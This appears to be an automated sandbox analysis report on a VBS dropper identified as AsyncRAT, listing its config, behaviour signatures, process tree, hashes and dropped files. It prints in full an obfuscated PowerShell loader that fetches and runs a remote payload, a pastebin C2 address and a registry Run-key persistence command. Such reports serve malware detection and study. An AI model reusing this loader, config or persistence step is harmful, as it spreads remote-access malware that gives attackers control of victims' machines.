Overview

overview

10

Static

static

1

Patruljefrer.vbs

windows7-x64

8

Patruljefrer.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-11-2024 15:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Patruljefrer.vbs

  • Size

    67KB

  • MD5

    dc3c11c4fe11f72749d759a975e477f0

  • SHA1

    254baa6b1d875e004af665c120da7db6409cc73b

  • SHA256

    301c2c3ec7ac65bb681f01f1262b110e86822685101b37b8677422e10bacdb33

  • SHA512

    6a188b369fc07ee9cc5d111b6296833a91e9a82c722e5abb31fce4326e84c25749d9904fdd0e2c35803e3098bdf9971ae7a51834c98faa68a5bc52fea9ce1c0d

  • SSDEEP

    768:5SyQW9Cef223W+Tgk22+YmtCVMcS8Wxb8ilEq+/nenRmHtDpIWMz/a3mSO:5SyQQNxnWv8u8iuqCnX3Mz/ItO

Score
10/10
asyncratthe--capablediscoveryexecutionpersistencerat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

The--capable

Mutex

AsyncMutex_alcod

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

  • pastebin_config

    https://pastebin.com/raw/SBj8AU2u

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • Detected Nirsoft tools 1 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Patruljefrer.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Commemorators Brandsprjterne Englevinges Hoarsely Orthis Linjetllere Plaiter #>;$Crystallod='Lucie';<#Euler Showcasing Acouophonia Diaporthe Cott Barbens Ubevogtede #>; function Gulaks($Bedagets){If ($host.DebuggerEnabled) {$Plungingly++;}$Morcellation=$Tyranniernes+$Bedagets.'Length'-$Plungingly; for ( $Tankvognskrselsulykke=4;$Tankvognskrselsulykke -lt $Morcellation;$Tankvognskrselsulykke+=5){$Debattens=$Tankvognskrselsulykke;$Yammerly+=$Bedagets[$Tankvognskrselsulykke];}$Yammerly;}function Asylansgernes($selvstartere){ . ($Deontic) ($selvstartere);}$Timeling=Gulaks 'Un,fMTilso DadzFalsiCosmlUnwil ForaAwha/Omlb ';$holobaptist=Gulaks 'P odT UdrlAsp sPseu1Aftj2Napo ';$tinglysning='Elle[KvikNB otE E.tTBocc. PylSBlokEHousr uknvCastIUi,ecFjereF olPRaadONectiUnscN HelT StaMB llAU gaNA chAKultgNoncERiddRF am]Udva:Ador:.aadSSemiEIronC.topuSky.rStbdiPapiTBla yBo.aPvarirF jloScinTM ljO ca C CaroBajalTrag=Kis.$Fil Hbarro La.lBe,oOselsbpockaRes pAnalTAddii onksCivitAste ';$Timeling+=Gulaks ' Sto5Rece.Afla0 C u Regn(N npWDiviiPic,n,avtdFi kosko w AddsShow BenzNKumkT uk ra1 ps0Hvid. lan0Letv; Roo FgteW DrfiAllinAugu6Cere4 ca ;Uns. IndoxSen,6,esp4 Ase;pis ReoprEpigvSmad: A r1,lup3.ark1Chit.Rodo0paus)Ru f Skr,G C.teSpeecProskLenno B u/ Ho,2H.mo0Dose1 Soo0H.fm0Proc1 le0Maso1Fide A.taFStatiSum rL oiekenefAfkroShrixMisw/ Lus1 Ban3 Ind1 lu.M ns0Tipp ';$traktorfrers=Gulaks 'To,eU K nsO tlE VairOr r-lo fAAsbeGLovne,ispnEmbetShan ';$Vanskeligjorte=Gulaks 'Eca,hMisvt psptGlypp recsVrng: Bit/ U e/Dob fCheriRes lEffeePseud krinHamb.AnveePostuPhen/LowllFort9Jet,t kolECephwR.knb.utl9AnursNasu6R,klaMispa StrR W iw,raf5M,dafMu,iyPrinUSikkiBesiaGr,lCAlt 0 SlglD rmf Sue/ErytMSk baIm enBinoaV,gnmTelerArb.. foraHa ds emdSali ';$Mormoness=Gulaks 'Alme> I m ';$Deontic=Gulaks ' KrsiGranE anaXG ll ';$Bromocamphor='Wapper64';$Classicalize='\brucite.Spi';Asylansgernes (Gulaks 'Skar$BiblG .otl SphoJenfBRamua ForlNarc:EndobFazirUnb E l mvAf,ts hypaUng.m apLColaI AlgN CorGIndaEfu,frPel =Tigr$TaureSkabnvalmV ing:ZoanAAstoPRekvp akld Re,aRbart oorAEksp+Test$Ind.CFug,LpresaProgSFrstsPhiliQu,dC rylAMukkL SynIShriZTankETurn ');Asylansgernes (Gulaks 'skov$F vegKandlHaarOProtBGendAAffaLGen,:M.ngpTvaniHyreXUd iI exaLRehaaForhTAng i Sp.OS vsnu li=Unla$UnalVLevoAGeornFrayS KojkSilkeInciLHelviL ntGAma.JLideOFjl rTomaTUn,ie Ne..klasSKomppDe olHy oISil TModb(Arit$Sup M xemoEranRSke MBrodOTramnAttieConjS haiS Uds)Mats ');Asylansgernes (Gulaks $tinglysning);$Vanskeligjorte=$Pixilation[0];$Starik=(Gulaks 'Virk$ A,rg .sbLEkseo An b KloaEnthlChor:Sem PCor lK,lkaUsenN Un.L F lgG dt= M tNKor.e auWRefl-StanoSkraBSkb,JMembeRaesCSksttKneb BarSDrosYRoulS toTHepae sneMSman. Ge nSk lE Re TAcup.FeltWFortE Hj.b.aasC bacLPlanihypoEFe,rnD xaT chi ');Asylansgernes ($Starik);Asylansgernes (Gulaks 'Rytt$RibbPSektl Sena ,agnRensl nelgGrit.Dem.HDolieOp raUd id.reeeKa.arPsycs M n[Vand$KatatResurDranaFo kkBehatJismo Affr S nfGra,rS,heeSim rManus Hea]Muls= Try$PicuT IndiMonemscuteCorrlCaraiagitnHaevgKl r ');$Kapitalindkomsternes=Gulaks 'Genn$HaakPUdsul S oaEsten chilUncagProt. TriD ttoLegawHypsn,stil FreovandaPljedFremF Peri.errl ttneUnch( Tar$Org VSotta .lin efusIntek staeProclGummiU magRodfjGa toJeler StotStr e J,t,Cova$Versf pred AltrStrieL tbl ukaaTi dnOmp dre,ls onih Lanivriss irotResso echrKongiIthieAm urBr ss ,je)Moto ';$fdrelandshistoriers=$Brevsamlinger;Asylansgernes (Gulaks 'Cig $Vindggut.LChy,O Va,BAmp AStifLAfgr:M,emRH atEElevG UdeIBa ruAfh sB ia=Attr(klemtBordE RntsV veT nbr-GurgP ostaIn stS keHMask Carc$Pr bF,emodNonlRPeriEma iLCoveAShaynKln D SalS oonHP.odIBrudSUselTDireO krir Verip.alEDracrdicls F g)fro ');while (!$Regius) {Asylansgernes (Gulaks ' Bor$ButagGravl El.oDekabHella lilDiab:PitfSLandtN nerSponaBelunSemidCha e ialsRubi2semi5Honc5an.t=Beun$ oistCollrA uiusystePo.r ') ;Asylansgernes $Kapitalindkomsternes;Asylansgernes (Gulaks ' FooSDrmaTL,isABiogrGriftUdpi-UndeSSkolLGageeK.ngeAt.mp ,am U in4 Fru ');Asylansgernes (Gulaks 'Bung$ Allg .erL,opiODrisBDista .ddlGyro:,dmirKyleeVideGHebrIHjl.UhvilsBehf= Lin( In Tprepeunmes Dert spr-H ulPBarbaSuriTEthnhAnbr Galu$KermfGa pDValuRtri,e SmilImplaBirlNSa tDDrudsMotih R.oI AflsLimpTIrreOWolfr.euri Y,ee De RTi.bSskam)Bran ') ;Asylansgernes (Gulaks 'P il$ Crag Tr,L Lbeo BerbNoema FisLNor.: MeaSRanspH ttHS.geaLingE Scor LikICroua Vatc Fi EtidsaForlE Ud = ven$ForrGM anL F aO GanbOn,mA AfsLUnta:mrkeTFagse SkaNHollIBindaDuck+ D v+P,yc% Kan$Kun PMenei GulxChikIMis,LAigla,want,oulIUn uOtradNBogk.EgercDep.oTr.lUA,thnM.cktT,iv ') ;$Vanskeligjorte=$Pixilation[$Sphaeriaceae];}$handyrene=329247;$Cyclop=29188;Asylansgernes (Gulaks 'Murl$ TriG Wo,l OpsOTangBCarda .roLEfte: StoBHandISpe.CBarmhArreoStifrarbeDSpkl Guds=Be c CliGSkatEDeliT Fre-D ciC ge O KaunSkrut,ousEBiblnA,thtFree El g$IndgfRysldSangr tanER.alLNon,a DennPrakDEloksSt.nHHa oika tS hetTK,okoH miR Mi i alseSkrur QuisSkim ');Asylansgernes (Gulaks 'Lnpo$ ahlgSt.dl ,lkoN nrb ittaskd l Dis:DiskAUdpunDisesAccevErenaUdslr Phel UliiPar,gmalksSaugtMor e FadsKato Str =G,mo anac[UntrS CryySupps SkytEntyeLifemCocc.MuhaCAks.orentn HenvAntieb.lsrSubstData]Fisk:Jeps: DisFObdurRetioAxi.mSkraBAl,haD mmsUp.oeDist6 to,4.kiaSWarftBi tr naci ndinMoungHy,g( Lok$D niB TidiImmuc DauhBengoOverrZirkdNoth)Afd ');Asylansgernes (Gulaks ' No $BrndgUncoLSacrOWellBCoraA PhoLprew:Tvelt LreEVrd.M Tasp,andeGrenLtr nhHul,aDr fLVitaL loceS niRSnut Grnf=K le Resk[R nsSSimuyPe.mSLamatColoE Socmdrif.TailTClaneEndoXDecetNons.verdE knoNFoelCThruoStraD Stei BevNDobbg,nti] Ven:Ford: O eaOverSNeocCAlleiTogbIToil.Bedeg CirE Be t,ermsCharTCurerPre IKngtN RivgCoad(Disr$Bo,dAH tbnStvnS jeV raaOn wR,toml taaIdrungGrusSTripTDentEUnd SOpkl)Ple, ');Asylansgernes (Gulaks 'd kt$OvalgFou lKunsOEti,bReenAFrgelExto:mi ikEmbooOvernMusiKUnprU AbrrApter ChaEKom,NMeetCCheeE ArkdKremyFrosgS.ertFo,aiHjspGGrane KreSInte=Foru$Inmit nydeOdonMUnbePFleaE O,eLremoh Sexa Un,lBoggLGladeLo eRnatu.Hypps FluuRingb osfsRandt ommr A.rIAmphN hysgPest(Phos$LoimHUnagaFatinSubfdJordyBrinrPa eeCo tNSerieBytt,Ocul$KammC porYEllicT anLRecooT.umPOver) rej ');Asylansgernes $Konkurrencedygtiges;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Commemorators Brandsprjterne Englevinges Hoarsely Orthis Linjetllere Plaiter #>;$Crystallod='Lucie';<#Euler Showcasing Acouophonia Diaporthe Cott Barbens Ubevogtede #>; function Gulaks($Bedagets){If ($host.DebuggerEnabled) {$Plungingly++;}$Morcellation=$Tyranniernes+$Bedagets.'Length'-$Plungingly; for ( $Tankvognskrselsulykke=4;$Tankvognskrselsulykke -lt $Morcellation;$Tankvognskrselsulykke+=5){$Debattens=$Tankvognskrselsulykke;$Yammerly+=$Bedagets[$Tankvognskrselsulykke];}$Yammerly;}function Asylansgernes($selvstartere){ . ($Deontic) ($selvstartere);}$Timeling=Gulaks 'Un,fMTilso DadzFalsiCosmlUnwil ForaAwha/Omlb ';$holobaptist=Gulaks 'P odT UdrlAsp sPseu1Aftj2Napo ';$tinglysning='Elle[KvikNB otE E.tTBocc. PylSBlokEHousr uknvCastIUi,ecFjereF olPRaadONectiUnscN HelT StaMB llAU gaNA chAKultgNoncERiddRF am]Udva:Ador:.aadSSemiEIronC.topuSky.rStbdiPapiTBla yBo.aPvarirF jloScinTM ljO ca C CaroBajalTrag=Kis.$Fil Hbarro La.lBe,oOselsbpockaRes pAnalTAddii onksCivitAste ';$Timeling+=Gulaks ' Sto5Rece.Afla0 C u Regn(N npWDiviiPic,n,avtdFi kosko w AddsShow BenzNKumkT uk ra1 ps0Hvid. lan0Letv; Roo FgteW DrfiAllinAugu6Cere4 ca ;Uns. IndoxSen,6,esp4 Ase;pis ReoprEpigvSmad: A r1,lup3.ark1Chit.Rodo0paus)Ru f Skr,G C.teSpeecProskLenno B u/ Ho,2H.mo0Dose1 Soo0H.fm0Proc1 le0Maso1Fide A.taFStatiSum rL oiekenefAfkroShrixMisw/ Lus1 Ban3 Ind1 lu.M ns0Tipp ';$traktorfrers=Gulaks 'To,eU K nsO tlE VairOr r-lo fAAsbeGLovne,ispnEmbetShan ';$Vanskeligjorte=Gulaks 'Eca,hMisvt psptGlypp recsVrng: Bit/ U e/Dob fCheriRes lEffeePseud krinHamb.AnveePostuPhen/LowllFort9Jet,t kolECephwR.knb.utl9AnursNasu6R,klaMispa StrR W iw,raf5M,dafMu,iyPrinUSikkiBesiaGr,lCAlt 0 SlglD rmf Sue/ErytMSk baIm enBinoaV,gnmTelerArb.. foraHa ds emdSali ';$Mormoness=Gulaks 'Alme> I m ';$Deontic=Gulaks ' KrsiGranE anaXG ll ';$Bromocamphor='Wapper64';$Classicalize='\brucite.Spi';Asylansgernes (Gulaks 'Skar$BiblG .otl SphoJenfBRamua ForlNarc:EndobFazirUnb E l mvAf,ts hypaUng.m apLColaI AlgN CorGIndaEfu,frPel =Tigr$TaureSkabnvalmV ing:ZoanAAstoPRekvp akld Re,aRbart oorAEksp+Test$Ind.CFug,LpresaProgSFrstsPhiliQu,dC rylAMukkL SynIShriZTankETurn ');Asylansgernes (Gulaks 'skov$F vegKandlHaarOProtBGendAAffaLGen,:M.ngpTvaniHyreXUd iI exaLRehaaForhTAng i Sp.OS vsnu li=Unla$UnalVLevoAGeornFrayS KojkSilkeInciLHelviL ntGAma.JLideOFjl rTomaTUn,ie Ne..klasSKomppDe olHy oISil TModb(Arit$Sup M xemoEranRSke MBrodOTramnAttieConjS haiS Uds)Mats ');Asylansgernes (Gulaks $tinglysning);$Vanskeligjorte=$Pixilation[0];$Starik=(Gulaks 'Virk$ A,rg .sbLEkseo An b KloaEnthlChor:Sem PCor lK,lkaUsenN Un.L F lgG dt= M tNKor.e auWRefl-StanoSkraBSkb,JMembeRaesCSksttKneb BarSDrosYRoulS toTHepae sneMSman. Ge nSk lE Re TAcup.FeltWFortE Hj.b.aasC bacLPlanihypoEFe,rnD xaT chi ');Asylansgernes ($Starik);Asylansgernes (Gulaks 'Rytt$RibbPSektl Sena ,agnRensl nelgGrit.Dem.HDolieOp raUd id.reeeKa.arPsycs M n[Vand$KatatResurDranaFo kkBehatJismo Affr S nfGra,rS,heeSim rManus Hea]Muls= Try$PicuT IndiMonemscuteCorrlCaraiagitnHaevgKl r ');$Kapitalindkomsternes=Gulaks 'Genn$HaakPUdsul S oaEsten chilUncagProt. TriD ttoLegawHypsn,stil FreovandaPljedFremF Peri.errl ttneUnch( Tar$Org VSotta .lin efusIntek staeProclGummiU magRodfjGa toJeler StotStr e J,t,Cova$Versf pred AltrStrieL tbl ukaaTi dnOmp dre,ls onih Lanivriss irotResso echrKongiIthieAm urBr ss ,je)Moto ';$fdrelandshistoriers=$Brevsamlinger;Asylansgernes (Gulaks 'Cig $Vindggut.LChy,O Va,BAmp AStifLAfgr:M,emRH atEElevG UdeIBa ruAfh sB ia=Attr(klemtBordE RntsV veT nbr-GurgP ostaIn stS keHMask Carc$Pr bF,emodNonlRPeriEma iLCoveAShaynKln D SalS oonHP.odIBrudSUselTDireO krir Verip.alEDracrdicls F g)fro ');while (!$Regius) {Asylansgernes (Gulaks ' Bor$ButagGravl El.oDekabHella lilDiab:PitfSLandtN nerSponaBelunSemidCha e ialsRubi2semi5Honc5an.t=Beun$ oistCollrA uiusystePo.r ') ;Asylansgernes $Kapitalindkomsternes;Asylansgernes (Gulaks ' FooSDrmaTL,isABiogrGriftUdpi-UndeSSkolLGageeK.ngeAt.mp ,am U in4 Fru ');Asylansgernes (Gulaks 'Bung$ Allg .erL,opiODrisBDista .ddlGyro:,dmirKyleeVideGHebrIHjl.UhvilsBehf= Lin( In Tprepeunmes Dert spr-H ulPBarbaSuriTEthnhAnbr Galu$KermfGa pDValuRtri,e SmilImplaBirlNSa tDDrudsMotih R.oI AflsLimpTIrreOWolfr.euri Y,ee De RTi.bSskam)Bran ') ;Asylansgernes (Gulaks 'P il$ Crag Tr,L Lbeo BerbNoema FisLNor.: MeaSRanspH ttHS.geaLingE Scor LikICroua Vatc Fi EtidsaForlE Ud = ven$ForrGM anL F aO GanbOn,mA AfsLUnta:mrkeTFagse SkaNHollIBindaDuck+ D v+P,yc% Kan$Kun PMenei GulxChikIMis,LAigla,want,oulIUn uOtradNBogk.EgercDep.oTr.lUA,thnM.cktT,iv ') ;$Vanskeligjorte=$Pixilation[$Sphaeriaceae];}$handyrene=329247;$Cyclop=29188;Asylansgernes (Gulaks 'Murl$ TriG Wo,l OpsOTangBCarda .roLEfte: StoBHandISpe.CBarmhArreoStifrarbeDSpkl Guds=Be c CliGSkatEDeliT Fre-D ciC ge O KaunSkrut,ousEBiblnA,thtFree El g$IndgfRysldSangr tanER.alLNon,a DennPrakDEloksSt.nHHa oika tS hetTK,okoH miR Mi i alseSkrur QuisSkim ');Asylansgernes (Gulaks 'Lnpo$ ahlgSt.dl ,lkoN nrb ittaskd l Dis:DiskAUdpunDisesAccevErenaUdslr Phel UliiPar,gmalksSaugtMor e FadsKato Str =G,mo anac[UntrS CryySupps SkytEntyeLifemCocc.MuhaCAks.orentn HenvAntieb.lsrSubstData]Fisk:Jeps: DisFObdurRetioAxi.mSkraBAl,haD mmsUp.oeDist6 to,4.kiaSWarftBi tr naci ndinMoungHy,g( Lok$D niB TidiImmuc DauhBengoOverrZirkdNoth)Afd ');Asylansgernes (Gulaks ' No $BrndgUncoLSacrOWellBCoraA PhoLprew:Tvelt LreEVrd.M Tasp,andeGrenLtr nhHul,aDr fLVitaL loceS niRSnut Grnf=K le Resk[R nsSSimuyPe.mSLamatColoE Socmdrif.TailTClaneEndoXDecetNons.verdE knoNFoelCThruoStraD Stei BevNDobbg,nti] Ven:Ford: O eaOverSNeocCAlleiTogbIToil.Bedeg CirE Be t,ermsCharTCurerPre IKngtN RivgCoad(Disr$Bo,dAH tbnStvnS jeV raaOn wR,toml taaIdrungGrusSTripTDentEUnd SOpkl)Ple, ');Asylansgernes (Gulaks 'd kt$OvalgFou lKunsOEti,bReenAFrgelExto:mi ikEmbooOvernMusiKUnprU AbrrApter ChaEKom,NMeetCCheeE ArkdKremyFrosgS.ertFo,aiHjspGGrane KreSInte=Foru$Inmit nydeOdonMUnbePFleaE O,eLremoh Sexa Un,lBoggLGladeLo eRnatu.Hypps FluuRingb osfsRandt ommr A.rIAmphN hysgPest(Phos$LoimHUnagaFatinSubfdJordyBrinrPa eeCo tNSerieBytt,Ocul$KammC porYEllicT anLRecooT.umPOver) rej ');Asylansgernes $Konkurrencedygtiges;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Command and Scripting Interpreter: PowerShell
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3524
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4708
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lateropulsion167" /t REG_EXPAND_SZ /d "%Ancientism% -windowstyle 1 $Uranolatry=(gp -Path 'HKCU:\Software\Semiopaque\').Zadokite;%Ancientism% ($Uranolatry)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:784
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lateropulsion167" /t REG_EXPAND_SZ /d "%Ancientism% -windowstyle 1 $Uranolatry=(gp -Path 'HKCU:\Software\Semiopaque\').Zadokite;%Ancientism% ($Uranolatry)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1308

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    2d74f3420d97c3324b6032942f3a9fa7

    SHA1

    95af9f165ffc370c5d654a39d959a8c4231122b9

    SHA256

    8937b96201864340f7fae727ff0339d0da2ad23c822774ff8ff25afa2ae4da3d

    SHA512

    3c3d2ae3b2581ff32cfee2aedca706e4eaa111a1f9baeb9f022762f7ef2dfb6734938c39eb17974873ad01a4760889e81a7b45d7ed404eb5830f73eb23737f1a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tzzyh3d5.i5g.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\brucite.Spi
    Filesize

    466KB

    MD5

    6596a850fa94835dd7404e96045d86e0

    SHA1

    3de617170993cc1854f270a7c92127ebc1c2f9f1

    SHA256

    1b535496df16dd8eab04881218b92485dc1bec29f0e64084bdd197be0bad42bf

    SHA512

    ddcabbeb2e890caca7f47aa995767e769d7357a3ef6f309b6e2a10c8b381500617b25a3e3cc34909835dc27c9427f2b32158999fca1a7bdc05085153a05460b8

    Download Submit

  • memory/2400-14-0x00007FF974DB0000-0x00007FF975871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-15-0x00007FF974DB0000-0x00007FF975871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-16-0x000002097AC80000-0x000002097ACA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2400-19-0x00007FF974DB0000-0x00007FF975871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-22-0x00007FF974DB0000-0x00007FF975871000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2400-4-0x00007FF974DB3000-0x00007FF974DB5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3524-41-0x00000000075D0000-0x0000000007C4A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3524-45-0x0000000008200000-0x00000000087A4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/3524-27-0x0000000005750000-0x00000000057B6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3524-37-0x00000000057C0000-0x0000000005B14000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3524-25-0x0000000004DF0000-0x0000000004E12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3524-39-0x0000000005D90000-0x0000000005DAE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3524-40-0x0000000005DD0000-0x0000000005E1C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3524-24-0x0000000004E40000-0x0000000005468000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/3524-42-0x0000000006350000-0x000000000636A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/3524-43-0x0000000007000000-0x0000000007096000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3524-44-0x0000000006FA0000-0x0000000006FC2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3524-26-0x00000000056E0000-0x0000000005746000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3524-23-0x00000000047D0000-0x0000000004806000-memory.dmp

    Filesize

    216KB

    Download

  • memory/3524-47-0x00000000087B0000-0x000000000CFD2000-memory.dmp

    Filesize

    72.1MB

    Download

  • memory/4708-48-0x0000000000E10000-0x0000000002064000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4708-59-0x0000000000E10000-0x0000000000E26000-memory.dmp

    Filesize

    88KB

    Download

  • memory/4708-58-0x0000000000E10000-0x0000000002064000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4708-60-0x0000000024B90000-0x0000000024C22000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4708-61-0x0000000024E30000-0x0000000024E3A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/4708-62-0x0000000025690000-0x000000002572C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4708-65-0x0000000025BE0000-0x0000000025D14000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4708-69-0x0000000022150000-0x00000000221C6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/4708-70-0x00000000068C0000-0x0000000006902000-memory.dmp

    Filesize

    264KB

    Download

  • memory/4708-71-0x0000000025800000-0x000000002581E000-memory.dmp

    Filesize

    120KB

    Download